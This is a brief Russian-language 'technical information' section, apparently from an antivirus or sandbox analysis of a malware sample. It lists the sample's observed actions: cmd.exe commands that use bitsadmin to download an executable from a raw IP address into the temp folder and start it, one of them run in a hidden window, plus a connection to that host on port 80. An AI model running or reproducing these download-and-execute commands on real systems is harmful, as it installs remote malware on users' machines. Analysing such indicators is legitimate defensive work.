Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer j1 http://94.156.189.54/egceidja.exe %TEMP%/1.exe && start %TEMP%/1.exe
- '94.##6.189.54':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer j1 http://94.156.189.54/egceidja.exe %TEMP%/1.exe && start %TEMP%/1.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer j1 http://94.156.189.54/egceidja.exe %LOCALAPPDATA%\Temp/1.exe